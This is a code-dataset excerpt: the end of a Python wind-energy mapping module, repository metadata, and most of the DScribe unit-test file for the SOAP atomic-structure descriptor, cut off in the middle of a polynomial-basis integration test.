fill_range=[0, 6],
overflow=None)
plot_map(config, c_f_loc*100,
title=r'$c_f$',
label=r'$c_f$ [%]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='cf_map'),
line_levels=[20., 40., 60.],
fill_range=[0, 60],
overflow=None)
else:
plot_discrete_map(config,
aep_loc,
title="AEP for {} clusters".format(
config.Clustering.n_clusters),
label='AEP [MWh]',
plots_interactive=config.Plotting.plots_interactive,
file_name=config.IO.plot_output.format(
title='aep_discrete_map')
)
return aep_loc, c_f_loc
def cf_turbine(config):
p_max = 2.04e6
turb_height = 60
from ..eval.optimal_harvesting_height import get_wind_speed_at_height, \
barometric_height_formula, match_loc_data_map_data
v_turb, _ = get_wind_speed_at_height(config, set_height=turb_height)
rho = barometric_height_formula(turb_height)
def calc_turbine_power(v, rho):
power_coeff = np.array([23070., -111500., 134600.])
p = np.zeros(v.shape)
p[v < 2.5] = 0
p[v > 11.7] = rho/1.01325*2000000.
p[v > 22.] = 0
p[np.logical_and(v >= 2.5, v <= 11.7)] = rho/1.01325*np.polyval(
power_coeff, v[np.logical_and(v >= 2.5, v <= 11.7)])
p[p > 2000000.] = 2000000.
return p
p = calc_turbine_power(v_turb, rho)
cf = np.mean(p, axis=1) / p_max
return match_loc_data_map_data(config, cf)
def compare_cf_AWE_turbine(config):
cf_turb = cf_turbine(config)
aep_AWE, cf_AWE = aep_map(config)
plot_cf_map(cf_turb, cf_AWE)
plt.show()
if __name__ == "__main__":
from ..config import Config
config = Config()
config)
if config.Plotting.plots_interactive:
plt.show()
| true | true |
1c3c74555d9da04e5e1876e8c8ddebb140e9366d | 37,406 | py | Python | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Copyright 2019 DScribe developers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import math
import unittest
import numpy as np
import scipy
import scipy.sparse
from scipy.integrate import tplquad
from scipy.linalg import sqrtm
from dscribe.descriptors import SOAP
from testbaseclass import TestBaseClass
from ase import Atoms
from ase.build import molecule
# Water molecule test system: O-H bond length 0.95 Å, H-O-H angle of
# 76 degrees, placed in a 1 Å cubic cell.
H2O = Atoms(
    cell=[
        [1.0, 0.0, 0.0],
        [0.0, 1.0, 0.0],
        [0.0, 0.0, 1.0]
    ],
    positions=[
        [0, 0, 0],
        [0.95, 0, 0],
        [0.95*(1+math.cos(76/180*math.pi)), 0.95*math.sin(76/180*math.pi), 0.0]
    ],
    symbols=["H", "O", "H"],
)
# Single hydrogen atom in a large (15 Å) cubic cell, i.e. effectively
# isolated from its periodic images.
H = Atoms(
    cell=[
        [15.0, 0.0, 0.0],
        [0.0, 15.0, 0.0],
        [0.0, 0.0, 15.0]
    ],
    positions=[
        [0, 0, 0],
    ],
    symbols=["H"],
)
class SoapTests(TestBaseClass, unittest.TestCase):
    def test_constructor(self):
        """Tests different valid and invalid constructor values.

        Each invalid setup must raise a ValueError, either at construction
        or on the first create() call.
        """
        # Invalid gaussian width: sigma must be positive
        with self.assertRaises(ValueError):
            SOAP(species=[-1, 2], rcut=5, sigma=0, nmax=5, lmax=5, periodic=True)
        with self.assertRaises(ValueError):
            SOAP(species=[-1, 2], rcut=5, sigma=-1, nmax=5, lmax=5, periodic=True)

        # Invalid rcut: below the minimum allowed cutoff
        with self.assertRaises(ValueError):
            SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=5, periodic=True)

        # Invalid lmax: too high for the gto basis
        with self.assertRaises(ValueError):
            SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=10, rbf="gto", periodic=True)

        # Invalid nmax: must be at least 1
        with self.assertRaises(ValueError):
            SOAP(species=["H", "O"], rcut=4, sigma=1, nmax=0, lmax=8, rbf="gto", periodic=True)

        # Too high radial basis set density: poly
        # (raised only when the descriptor is evaluated)
        with self.assertRaises(ValueError):
            a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=12, lmax=8, rbf="polynomial", periodic=False)
            a.create(H2O)

        # Too high radial basis set density: gto
        with self.assertRaises(ValueError):
            a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=20, lmax=8, rbf="gto", periodic=False)
            a.create(H2O)
    def test_properties(self):
        """Used to test that changing the setup through properties works as
        intended.
        """
        # Test changing species: setting a new species list through the
        # property must change both the reported and the produced feature
        # count.
        a = SOAP(
            species=[1, 8],
            rcut=3,
            nmax=3,
            lmax=3,
            sparse=False,
        )
        nfeat1 = a.get_number_of_features()
        vec1 = a.create(H2O)
        a.species = ["C", "H", "O"]
        nfeat2 = a.get_number_of_features()
        vec2 = a.create(molecule("CH3OH"))
        self.assertTrue(nfeat1 != nfeat2)
        self.assertTrue(vec1.shape[1] != vec2.shape[1])
    def test_number_of_features(self):
        """Tests that the reported number of features is correct.
        """
        lmax = 5
        nmax = 5
        n_elems = 2
        desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)

        # Test that the reported number of features matches the expected:
        # one block per unordered species pair, each with nmax*(nmax+1)/2
        # radial combinations for every l = 0..lmax.
        n_features = desc.get_number_of_features()
        n_blocks = n_elems*(n_elems+1)/2
        expected = int((lmax + 1) * nmax * (nmax + 1) / 2 * n_blocks)
        self.assertEqual(n_features, expected)

        # Test that the outputted number of features matches the reported
        n_features = desc.get_number_of_features()
        vec = desc.create(H2O)
        self.assertEqual(n_features, vec.shape[1])
    def test_multiple_species(self):
        """Tests multiple species are handled correctly.

        Builds three 8-atom chains from a 16-species list with different
        degrees of elemental overlap and checks the overlap of their
        descriptors via dot products.
        """
        lmax = 5
        nmax = 5
        species = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
        desc = SOAP(species=species, rcut=5, nmax=nmax, lmax=lmax, periodic=False, sparse=False)

        # Atoms placed along the cell diagonal, 8 per system.
        pos = np.expand_dims(np.linspace(0, 8, 8), 1)
        pos = np.hstack((pos, pos, pos))
        sys = Atoms(
            symbols=species[0:8],
            positions=pos,
            pbc=False
        )
        vec1 = desc.create(sys)

        sys2 = Atoms(
            symbols=species[8:],
            positions=pos,
            pbc=False
        )
        vec2 = desc.create(sys2)

        # Shares four species with each of the two systems above.
        sys3 = Atoms(
            symbols=species[4:12],
            positions=pos,
            pbc=False
        )
        vec3 = desc.create(sys3)

        dot1 = np.dot(vec1[6, :], vec2[6, :])
        dot2 = np.dot(vec1[3, :], vec3[3, :])
        dot3 = np.dot(vec2[3, :], vec3[3, :])

        # The dot product for systems without overlap in species should be zero
        self.assertTrue(abs(dot1) <= 1e-8)

        # The systems with overlap in the elements should have onerlap in the
        # dot product
        self.assertTrue(abs(dot2) > 1e-3)
        self.assertTrue(abs(dot3) > 1e-3)
    def test_flatten(self):
        """Tests the flattening.
        """
        # TODO(review): empty placeholder — this test silently passes
        # without asserting anything; implement it or mark it skipped.
    def test_soap_structure(self):
        """Tests that when no positions are given, the SOAP for the full
        structure is calculated.
        """
        lmax = 5
        nmax = 5
        desc = SOAP(species=[1, 8], rcut=5, nmax=nmax, lmax=lmax, periodic=True)

        # One output row per atom in the 3-atom H2O system.
        vec = desc.create(H2O)
        self.assertTrue(vec.shape[0] == 3)
    def test_sparse(self):
        """Tests the sparse matrix creation.
        """
        # Dense: sparse=False must yield a plain numpy array
        desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=False)
        vec = desc.create(H2O)
        self.assertTrue(type(vec) == np.ndarray)

        # Sparse: sparse=True must yield a scipy COO matrix
        desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=True)
        vec = desc.create(H2O)
        self.assertTrue(type(vec) == scipy.sparse.coo_matrix)
    def test_positions(self):
        """Tests that different positions are handled correctly.

        For every periodic/crossover combination, positions may be given
        as cartesian coordinates, atom indices, or omitted (all atoms);
        the output row count must match. Invalid position entries must
        raise a ValueError.
        """
        # periodic=False, crossover=True
        desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
        n_feat = desc.get_number_of_features()
        self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
        self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
        self.assertEqual((3, n_feat), desc.create(H2O).shape)

        # periodic=True, crossover=True
        desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
        n_feat = desc.get_number_of_features()
        self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
        self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
        self.assertEqual((3, n_feat), desc.create(H2O).shape)

        # periodic=True, crossover=False
        desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=False,)
        n_feat = desc.get_number_of_features()
        self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
        self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
        self.assertEqual((3, n_feat), desc.create(H2O).shape)

        # periodic=False, crossover=False
        desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=False,)
        n_feat = desc.get_number_of_features()
        self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
        self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
        self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
        self.assertEqual((3, n_feat), desc.create(H2O).shape)

        # Non-numeric position entries are rejected.
        with self.assertRaises(ValueError):
            desc.create(H2O, positions=['a'])
    def test_parallel_dense(self):
        """Tests creating dense output parallelly.

        The same SOAP descriptor is evaluated with n_jobs=1 and n_jobs=2
        and each parallel result is compared against serial, per-system
        reference calls. Covers: index positions, positions=None
        (all atoms), cartesian positions, and averaged output.
        """
        samples = [molecule("CO"), molecule("N2O")]
        desc = SOAP(
            species=[6, 7, 8],
            rcut=5,
            nmax=3,
            lmax=3,
            sigma=1,
            periodic=False,
            crossover=True,
            average=False,
            sparse=False,
        )
        n_features = desc.get_number_of_features()
        # Multiple systems, serial job
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=1,
        )
        # Reference: one serial create() call per requested position
        assumed = np.empty((3, n_features))
        assumed[0, :] = desc.create(samples[0], [0])
        assumed[1, :] = desc.create(samples[1], [0])
        assumed[2, :] = desc.create(samples[1], [1])
        self.assertTrue(np.allclose(output, assumed))
        # Test when position given as indices
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=2,
        )
        assumed = np.empty((3, n_features))
        assumed[0, :] = desc.create(samples[0], [0])
        assumed[1, :] = desc.create(samples[1], [0])
        assumed[2, :] = desc.create(samples[1], [1])
        self.assertTrue(np.allclose(output, assumed))
        # Test with no positions specified
        output = desc.create(
            system=samples,
            positions=[None, None],
            n_jobs=2,
        )
        # None means all atoms: CO has 2 atoms, N2O has 3
        assumed = np.empty((2+3, n_features))
        assumed[0, :] = desc.create(samples[0], [0])
        assumed[1, :] = desc.create(samples[0], [1])
        assumed[2, :] = desc.create(samples[1], [0])
        assumed[3, :] = desc.create(samples[1], [1])
        assumed[4, :] = desc.create(samples[1], [2])
        self.assertTrue(np.allclose(output, assumed))
        # Test with cartesian positions
        output = desc.create(
            system=samples,
            positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
            n_jobs=2,
        )
        assumed = np.empty((2+1, n_features))
        assumed[0, :] = desc.create(samples[0], [[0, 0, 0]])
        assumed[1, :] = desc.create(samples[0], [[1, 2, 0]])
        assumed[2, :] = desc.create(samples[1], [[1, 2, 0]])
        self.assertTrue(np.allclose(output, assumed))
        # Test averaged output (toggled via the private _average flag)
        desc._average = True
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=2,
        )
        assumed = np.empty((2, n_features))
        assumed[0, :] = desc.create(samples[0], [0])
        assumed[1, :] = 1/2*(desc.create(samples[1], [0]) + desc.create(samples[1], [1]))
        self.assertTrue(np.allclose(output, assumed))
    def test_parallel_sparse(self):
        """Tests creating sparse output parallelly.

        Mirrors test_parallel_dense but with sparse=True; all outputs are
        densified with toarray() before the comparison.
        """
        # Test indices
        samples = [molecule("CO"), molecule("N2O")]
        desc = SOAP(
            species=[6, 7, 8],
            rcut=5,
            nmax=3,
            lmax=3,
            sigma=1,
            periodic=False,
            crossover=True,
            average=False,
            sparse=True,
        )
        n_features = desc.get_number_of_features()
        # Multiple systems, serial job
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=1,
        ).toarray()
        # Reference: one serial create() call per requested position
        assumed = np.empty((3, n_features))
        assumed[0, :] = desc.create(samples[0], [0]).toarray()
        assumed[1, :] = desc.create(samples[1], [0]).toarray()
        assumed[2, :] = desc.create(samples[1], [1]).toarray()
        self.assertTrue(np.allclose(output, assumed))
        # Test when position given as indices
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=2,
        ).toarray()
        assumed = np.empty((3, n_features))
        assumed[0, :] = desc.create(samples[0], [0]).toarray()
        assumed[1, :] = desc.create(samples[1], [0]).toarray()
        assumed[2, :] = desc.create(samples[1], [1]).toarray()
        self.assertTrue(np.allclose(output, assumed))
        # Test with no positions specified
        output = desc.create(
            system=samples,
            positions=[None, None],
            n_jobs=2,
        ).toarray()
        # None means all atoms: CO has 2 atoms, N2O has 3
        assumed = np.empty((2+3, n_features))
        assumed[0, :] = desc.create(samples[0], [0]).toarray()
        assumed[1, :] = desc.create(samples[0], [1]).toarray()
        assumed[2, :] = desc.create(samples[1], [0]).toarray()
        assumed[3, :] = desc.create(samples[1], [1]).toarray()
        assumed[4, :] = desc.create(samples[1], [2]).toarray()
        self.assertTrue(np.allclose(output, assumed))
        # Test with cartesian positions
        output = desc.create(
            system=samples,
            positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
            n_jobs=2,
        ).toarray()
        assumed = np.empty((2+1, n_features))
        assumed[0, :] = desc.create(samples[0], [[0, 0, 0]]).toarray()
        assumed[1, :] = desc.create(samples[0], [[1, 2, 0]]).toarray()
        assumed[2, :] = desc.create(samples[1], [[1, 2, 0]]).toarray()
        self.assertTrue(np.allclose(output, assumed))
        # Test averaged output (toggled via the private _average flag)
        desc._average = True
        output = desc.create(
            system=samples,
            positions=[[0], [0, 1]],
            n_jobs=2,
        ).toarray()
        assumed = np.empty((2, n_features))
        assumed[0, :] = desc.create(samples[0], [0]).toarray()
        assumed[1, :] = 1/2*(desc.create(samples[1], [0]).toarray() + desc.create(samples[1], [1]).toarray())
        self.assertTrue(np.allclose(output, assumed))
def test_unit_cells(self):
"""Tests if arbitrary unit cells are accepted"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
# Invalid unit cell
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
with self.assertRaises(ValueError):
desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_pbc(True)
molecule.set_cell([
[20.0, 0.0, 0.0],
[0.0, 30.0, 0.0],
[0.0, 0.0, 40.0],
])
largecell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_smallcell = desc.create(molecule, positions=[[0, 0, 0]])
def test_is_periodic(self):
"""Tests whether periodic images are seen by the descriptor"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True,)
H2O.set_pbc(False)
nocell = desc.create(H2O, positions=[[0, 0, 0]])
H2O.set_pbc(True)
H2O.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
cubic_cell = desc.create(H2O, positions=[[0, 0, 0]])
self.assertTrue(np.sum(cubic_cell) > 0)
def test_periodic_images(self):
"""Tests the periodic images seen by the descriptor
"""
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
# Non-periodic for comparison
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
# Make periodic
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
molecule.set_pbc(True)
# Cubic
molecule.set_cell([
[3.0, 0.0, 0.0],
[0.0, 3.0, 0.0],
[0.0, 0.0, 3.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
cubic_suce = desc.create(suce, positions=[[0, 0, 0]])
# Triclinic
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
triclinic_suce = desc.create(suce, positions=[[0, 0, 0]])
self.assertTrue(np.sum(np.abs((nocell[:3] - cubic_suce[:3]))) > 0.1)
self.assertAlmostEqual(np.sum(cubic_cell[:3] - cubic_suce[:3]), 0)
self.assertAlmostEqual(np.sum(triclinic_cell[:3] - triclinic_suce[:3]), 0)
def test_symmetries(self):
"""Tests that the descriptor has the correct invariances.
"""
def create_gto(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=5,
nmax=5,
rbf="gto",
periodic=False,
crossover=True
)
return desc.create(system)
# Rotational check
self.assertTrue(self.is_rotationally_symmetric(create_gto))
# Translational
self.assertTrue(self.is_translationally_symmetric(create_gto))
def create_poly(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=2,
nmax=1,
rbf="polynomial",
periodic=False,
crossover=True
)
return desc.create(system)
# Rotational check
self.assertTrue(self.is_rotationally_symmetric(create_poly))
# Translational
self.assertTrue(self.is_translationally_symmetric(create_poly))
def test_average(self):
"""Tests that the average output is created correctly.
"""
sys = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
# Create the average output
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=True,
sparse=False
)
average = desc.create(sys)[0, :]
# Create individual output for both atoms
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=False,
sparse=False
)
first = desc.create(sys, positions=[0])[0, :]
second = desc.create(sys, positions=[1])[0, :]
# Check that the averaging is done correctlyl
assumed_average = (first+second)/2
self.assertTrue(np.array_equal(average, assumed_average))
def test_basis(self):
"""Tests that the output vectors behave correctly as a basis.
"""
sys1 = Atoms(symbols=["H", "H"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys2 = Atoms(symbols=["O", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys3 = Atoms(symbols=["C", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys4 = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
sys5 = Atoms(symbols=["H", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys6 = Atoms(symbols=["H", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys7 = Atoms(symbols=["C", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
sparse=False
)
# Create vectors for each system
vec1 = desc.create(sys1, positions=[[0, 0, 0]])[0, :]
vec2 = desc.create(sys2, positions=[[0, 0, 0]])[0, :]
vec3 = desc.create(sys3, positions=[[0, 0, 0]])[0, :]
vec4 = desc.create(sys4, positions=[[0, 0, 0]])[0, :]
vec5 = desc.create(sys5, positions=[[0, 0, 0]])[0, :]
vec6 = desc.create(sys6, positions=[[0, 0, 0]])[0, :]
vec7 = desc.create(sys7, positions=[[0, 0, 0]])[0, :]
# The dot-product should be zero when there are no overlapping elements
dot = np.dot(vec1, vec2)
self.assertEqual(dot, 0)
dot = np.dot(vec2, vec3)
self.assertEqual(dot, 0)
# The dot-product should be non-zero when there are overlapping elements
dot = np.dot(vec4, vec5)
self.assertNotEqual(dot, 0)
# Check that self-terms are in correct location
n_elem_feat = desc.get_number_of_element_features()
h_part1 = vec1[0:n_elem_feat]
h_part2 = vec2[0:n_elem_feat]
h_part4 = vec4[0:n_elem_feat]
self.assertNotEqual(np.sum(h_part1), 0)
self.assertEqual(np.sum(h_part2), 0)
self.assertNotEqual(np.sum(h_part4), 0)
# Check that cross terms are in correct location
hc_part1 = vec1[1*n_elem_feat:2*n_elem_feat]
hc_part4 = vec4[1*n_elem_feat:2*n_elem_feat]
co_part6 = vec6[4*n_elem_feat:5*n_elem_feat]
co_part7 = vec7[4*n_elem_feat:5*n_elem_feat]
self.assertEqual(np.sum(hc_part1), 0)
self.assertNotEqual(np.sum(hc_part4), 0)
self.assertEqual(np.sum(co_part6), 0)
self.assertNotEqual(np.sum(co_part7), 0)
def test_rbf_orthonormality(self):
"""Tests that the gto radial basis functions are orthonormal.
"""
sigma = 0.15
rcut = 2.0
nmax = 2
lmax = 3
soap = SOAP(species=[1], lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
alphas = np.reshape(soap._alphas, [10, nmax])
betas = np.reshape(soap._betas, [10, nmax, nmax])
nr = 10000
n_basis = 0
functions = np.zeros((nmax, lmax+1, nr))
# Form the radial basis functions
for n in range(nmax):
for l in range(lmax+1):
gto = np.zeros((nr))
rspace = np.linspace(0, rcut+5, nr)
for k in range(nmax):
gto += betas[l, n, k]*rspace**l*np.exp(-alphas[l, k]*rspace**2)
n_basis += 1
functions[n, l, :] = gto
# Calculate the overlap integrals
S = np.zeros((nmax, nmax))
l = 0
for l in range(lmax+1):
for i in range(nmax):
for j in range(nmax):
overlap = np.trapz(rspace**2*functions[i, l, :]*functions[j, l, :], dx=(rcut+5)/nr)
S[i, j] = overlap
# Check that the basis functions for each l are orthonormal
diff = S-np.eye(nmax)
self.assertTrue(np.allclose(diff, np.zeros((nmax, nmax)), atol=1e-3))
    def test_gto_integration(self):
        """Tests that the completely analytical partial power spectrum with the
        GTO basis corresponds to the easier-to-code but less performant
        numerical integration done with python.

        The numerical reference integrates gto * Y_lm * rho * jacobian over
        the full spherical volume with scipy's tplquad for every (Z, n, l, m)
        and then assembles the partial power spectrum from the coefficients.
        """
        sigma = 0.55
        rcut = 2.0
        nmax = 2
        lmax = 2
        # Limits for radius
        r1 = 0.
        r2 = rcut+5
        # Limits for theta
        t1 = 0
        t2 = np.pi
        # Limits for phi
        p1 = 0
        p2 = 2*np.pi
        positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
        symbols = np.array(["H", "C"])
        system = Atoms(positions=positions, symbols=symbols)
        species = system.get_atomic_numbers()
        elements = set(system.get_atomic_numbers())
        n_elems = len(elements)
        # Calculate the analytical power spectrum and the weights and decays of
        # the radial basis functions.
        soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
        analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
        alphagrid = np.reshape(soap._alphas, [10, nmax])
        betagrid = np.reshape(soap._betas, [10, nmax, nmax])
        # Numerical expansion coefficients c_{Znlm}, filled below by direct
        # 3D integration in spherical coordinates
        coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
        for iZ, Z in enumerate(elements):
            indices = np.argwhere(species == Z)[0]
            elem_pos = positions[indices]
            for n in range(nmax):
                for l in range(lmax+1):
                    for im, m in enumerate(range(-l, l+1)):
                        # Calculate numerical coefficients
                        # NOTE: the closure reads n, l and m late, but the
                        # integral is evaluated immediately below, before the
                        # loop variables advance, so the binding is safe.
                        def soap_coeff(phi, theta, r):
                            # Regular spherical harmonic, notice the abs(m)
                            # needed for constructing the real form
                            ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta) # NOTE: scipy swaps phi and theta
                            # Construct real (tesseral) spherical harmonics for
                            # easier integration without having to worry about
                            # the imaginary part. The real spherical harmonics
                            # span the same space, but are just computationally
                            # easier.
                            ylm_real = np.real(ylm_comp)
                            ylm_imag = np.imag(ylm_comp)
                            if m < 0:
                                ylm = np.sqrt(2)*(-1)**m*ylm_imag
                            elif m == 0:
                                ylm = ylm_comp
                            else:
                                ylm = np.sqrt(2)*(-1)**m*ylm_real
                            # Spherical gaussian type orbital
                            gto = 0
                            for i in range(nmax):
                                i_alpha = alphagrid[l, i]
                                i_beta = betagrid[l, n, i]
                                i_gto = i_beta*r**l*np.exp(-i_alpha*r**2)
                                gto += i_gto
                            # Atomic density
                            rho = 0
                            for i_pos in elem_pos:
                                ix = i_pos[0]
                                iy = i_pos[1]
                                iz = i_pos[2]
                                ri_squared = ix**2+iy**2+iz**2
                                rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
                            # Jacobian
                            jacobian = np.sin(theta)*r**2
                            return gto*ylm*rho*jacobian
                        cnlm = tplquad(
                            soap_coeff,
                            r1,
                            r2,
                            lambda r: t1,
                            lambda r: t2,
                            lambda r, theta: p1,
                            lambda r, theta: p2,
                            epsabs=0.001,
                            epsrel=0.001,
                        )
                        integral, error = cnlm
                        coeffs[iZ, n, l, im] = integral
        # Calculate the partial power spectrum: only the unique
        # (zi <= zj, ni <= nj) combinations are stored
        numerical_power_spectrum = []
        for zi in range(n_elems):
            for zj in range(n_elems):
                for l in range(lmax+1):
                    for ni in range(nmax):
                        for nj in range(nmax):
                            if nj >= ni:
                                if zj >= zi:
                                    value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
                                    prefactor = np.pi*np.sqrt(8/(2*l+1))
                                    value *= prefactor
                                    numerical_power_spectrum.append(value)
        # print("Numerical: {}".format(numerical_power_spectrum))
        # print("Analytical: {}".format(analytical_power_spectrum))
        self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
    def test_poly_integration(self):
        """Tests that the partial power spectrum with the polynomial basis done
        with C corresponds to the easier-to-code but less performant
        integration done with python.

        The numerical reference integrates poly * Y_lm * rho * jacobian over
        the full spherical volume with scipy's tplquad for every (Z, n, l, m)
        and then assembles the partial power spectrum from the coefficients.
        """
        sigma = 0.55
        rcut = 2.0
        nmax = 2
        lmax = 2
        # Limits for radius
        r1 = 0.
        r2 = rcut+5
        # Limits for theta
        t1 = 0
        t2 = np.pi
        # Limits for phi
        p1 = 0
        p2 = 2*np.pi
        positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
        symbols = np.array(["H", "C"])
        system = Atoms(positions=positions, symbols=symbols)
        species = system.get_atomic_numbers()
        elements = set(system.get_atomic_numbers())
        n_elems = len(elements)
        # Calculate the overlap of the different polynomial functions in a
        # matrix S. These overlaps defined through the dot product over the
        # radial coordinate are analytically calculable: Integrate[(rc - r)^(a
        # + 2) (rc - r)^(b + 2) r^2, {r, 0, rc}]. Then the weights B that make
        # the basis orthonormal are given by B=S^{-1/2}
        S = np.zeros((nmax, nmax))
        for i in range(1, nmax+1):
            for j in range(1, nmax+1):
                S[i-1, j-1] = (2*(rcut)**(7+i+j))/((5+i+j)*(6+i+j)*(7+i+j))
